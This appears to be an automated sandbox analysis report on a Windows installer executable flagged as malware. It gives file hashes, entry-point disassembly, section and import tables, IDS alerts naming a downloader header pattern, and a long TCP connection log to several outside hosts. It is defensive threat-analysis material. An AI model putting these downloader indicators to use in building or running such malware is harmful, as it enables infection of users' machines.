                                            File size:1'261'140 bytes
                                            MD5:9970463edf086976996f0bc196fcfc60
                                            SHA1:22f3132f1456dba3bcc7096d2c10c5635ee08828
                                            SHA256:6e0230eac8eeadd5214b6d83cc2f470933bee1c4261a607e182a093af14b62cb
                                            SHA512:bed16bf0f2ad277ac3cf34937e128efbd861472f99c0d1cb36f1bb89f7a5dab64174bc113c707ceee52a2bc39d2546610015edb54c18a076a297ce5ec7d7c7d9
                                            SSDEEP:24576:voqqHmQ2mlK1Vq4XYV+EYBU0pD1VHTkXQk9duRUrO0SmJ7GtHufK70y:voZmQ7KVVXzEYBUspQQEuROO0Douf+
                                            TLSH:47451202E9C0CFD7F96648B044D5E494B3F569F94DD16B0F32CD269A28F98E374A821D
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....e.Q.................\..........M2.......p....@
                                            Icon Hash:071c5c5f4f20111f
                                            Entrypoint:0x40324d
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x519965D9 [Sun May 19 23:52:57 2013 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:e990dd07e89d04c53e337ab9b3f5e0cc
                                            Instruction
                                            sub esp, 00000184h
                                            push ebx
                                            push ebp
                                            push esi
                                            xor ebx, ebx
                                            push edi
                                            mov dword ptr [esp+1Ch], ebx
                                            mov dword ptr [esp+10h], 00409130h
                                            mov dword ptr [esp+18h], ebx
                                            mov byte ptr [esp+14h], 00000020h
                                            call dword ptr [00407034h]
                                            push 00008001h
                                            call dword ptr [004070B4h]
                                            push ebx
                                            call dword ptr [0040728Ch]
                                            push 00000008h
                                            mov dword ptr [00423F98h], eax
                                            call 00007F3FD881168Bh
                                            mov dword ptr [00423EE4h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+38h]
                                            push 00000160h
                                            push eax
                                            push ebx
                                            push 0041F4A0h
                                            call dword ptr [00407164h]
                                            push 004091E4h
                                            push 004236E0h
                                            call 00007F3FD8811335h
                                            call dword ptr [004070B0h]
                                            mov ebp, 00429000h
                                            push eax
                                            push ebp
                                            call 00007F3FD8811323h
                                            push ebx
                                            call dword ptr [00407114h]
                                            cmp byte ptr [00429000h], 00000022h
                                            mov dword ptr [00423EE0h], eax
                                            mov eax, ebp
                                            jne 00007F3FD880E90Ch
                                            mov byte ptr [esp+14h], 00000022h
                                            mov eax, 00429001h
                                            push dword ptr [esp+14h]
                                            push eax
                                            call 00007F3FD8810DD0h
                                            push eax
                                            call dword ptr [00407220h]
                                            mov dword ptr [esp+20h], eax
                                            jmp 00007F3FD880E9C0h
                                            cmp cl, 00000020h
                                            jne 00007F3FD880E908h
                                            inc eax
                                            cmp byte ptr [eax], 00000020h
                                            je 00007F3FD880E8FCh
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x3edb0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x5bf00x5c00f0d04a8cf00dab694f96f83a6fb8deeaFalse0.6697944972826086data6.4809131863371IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x70000x11ce0x12006bf29bc07ee82c85e22382576e6107a3False0.4529079861111111OpenPGP Secret Key5.235976864115322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x90000x1afd80x400b8099c4227307bfa21b577bd03cec2ceFalse0.6015625data4.935360760194213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x240000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x340000x3edb00x3ee0038123f82dccbdf37cd57e4d88cc46b85False0.5937072875248509data6.240361968643795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_BITMAP0x344180x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                            RT_ICON0x347800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.41602093931148704
                                            RT_ICON0x44fa80xfd49PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9991209265742355
                                            RT_ICON0x54cf80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.46849379861257096
                                            RT_ICON0x5e1a00x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.47424812030075186
                                            RT_ICON0x649880x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4914972273567468
                                            RT_ICON0x69e100x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.48541568256967405
                                            RT_ICON0x6e0380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5407676348547718
                                            RT_ICON0x705e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5886491557223265
                                            RT_ICON0x716880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6635245901639344
                                            RT_ICON0x720100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.750886524822695
                                            RT_DIALOG0x724780x144dataEnglishUnited States0.5216049382716049
                                            RT_DIALOG0x725c00x13cdataEnglishUnited States0.5506329113924051
                                            RT_DIALOG0x727000x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x728000x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x729200xc4dataEnglishUnited States0.5918367346938775
                                            RT_DIALOG0x729e80x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x72a480x92dataEnglishUnited States0.7123287671232876
                                            RT_MANIFEST0x72ae00x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665
                                            DLLImport
                                            KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, SetFileAttributesA, lstrcmpiA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetTempPathA, GetWindowsDirectoryA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                            USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-14T09:12:11.601627+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449744193.122.130.080TCP
                                            2024-10-14T09:12:12.929762+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449744193.122.130.080TCP
                                            2024-10-14T09:12:13.508895+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449756188.114.96.3443TCP
                                            2024-10-14T09:12:14.070380+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449762193.122.130.080TCP
                                            2024-10-14T09:12:14.647364+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449768188.114.96.3443TCP
                                            2024-10-14T09:12:16.929136+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449783188.114.96.3443TCP
                                            2024-10-14T09:12:19.118410+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449802188.114.96.3443TCP
                                            2024-10-14T09:12:21.359711+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449821188.114.96.3443TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 14, 2024 09:12:05.986233950 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:05.986306906 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:05.986378908 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.021692991 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.021744967 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:06.686444044 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:06.686556101 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.687571049 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:06.687630892 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.756251097 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.756330013 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:06.757244110 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:06.757313967 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.760781050 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:06.807418108 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:07.067979097 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:07.068079948 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.068146944 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:07.068208933 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.068291903 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:07.068317890 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.068350077 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.068391085 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.068399906 CEST44349736142.250.185.110192.168.2.4
                                            Oct 14, 2024 09:12:07.068465948 CEST49736443192.168.2.4142.250.185.110
                                            Oct 14, 2024 09:12:07.105299950 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.105356932 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:07.105468035 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.105756044 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.105787039 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:07.784305096 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:07.784437895 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.886735916 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.886780024 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:07.887722969 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:07.887820959 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.891719103 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:07.939407110 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.067137957 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.067241907 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.072962046 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.073126078 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.085719109 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.085773945 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.085786104 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.085832119 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.093107939 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.093166113 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.161720037 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.161870956 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.161883116 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.161911964 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.161932945 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.161969900 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.161993980 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.162043095 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.162081957 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.162142038 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.162753105 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.162806988 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.162847996 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.162899971 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.169007063 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.169094086 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.169105053 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.169234991 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.175254107 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.175333023 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.175342083 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.175404072 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.181766033 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.181850910 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.181859016 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.181901932 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.188009977 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.188080072 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.188088894 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.188134909 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.194056988 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.194118977 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.194128036 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.194190979 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.199922085 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.199991941 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.200000048 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.200043917 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.205626965 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.205703020 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.205710888 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.205761909 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.211558104 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.211621046 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.211630106 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.211677074 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.217426062 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.217504025 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.232266903 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.232350111 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.232362986 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.232409954 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256342888 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256442070 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256485939 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256542921 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256582022 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256634951 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256676912 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256733894 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256774902 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256831884 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256872892 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.256921053 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.256966114 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257013083 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.257057905 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257108927 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.257148027 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257200956 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.257237911 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257286072 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.257334948 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257386923 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.257456064 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.257512093 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.259371042 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.259437084 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.259476900 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.259536028 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.264180899 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.264251947 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.264282942 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.264341116 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.269237041 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.269301891 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.269321918 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.269385099 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.273978949 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.274048090 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.274060965 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.274113894 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.278605938 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.278812885 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.278822899 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.278882027 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.283349037 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.283416033 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.283453941 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.283509016 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.288068056 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.288137913 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.288151026 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.288197041 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.292443037 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.292509079 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.292515993 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.292563915 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.297283888 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.297355890 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.297364950 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.297414064 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.301557064 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.301631927 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.301640034 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.301690102 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.305716991 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.305759907 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.305780888 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.305792093 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.305807114 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.305851936 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.310029030 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.310103893 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.310116053 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.310164928 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.313776016 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.313848972 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.313880920 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.313941002 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.317689896 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.317769051 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.317789078 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.317843914 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.321608067 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.321683884 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.321696043 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.321753025 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.325136900 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.325220108 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.325229883 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.325274944 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.328670979 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.328773022 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.328780890 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.328839064 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.332263947 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.332328081 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.350490093 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.350565910 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.350610971 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.350668907 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.350711107 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.350756884 CEST49737443192.168.2.4142.250.185.97
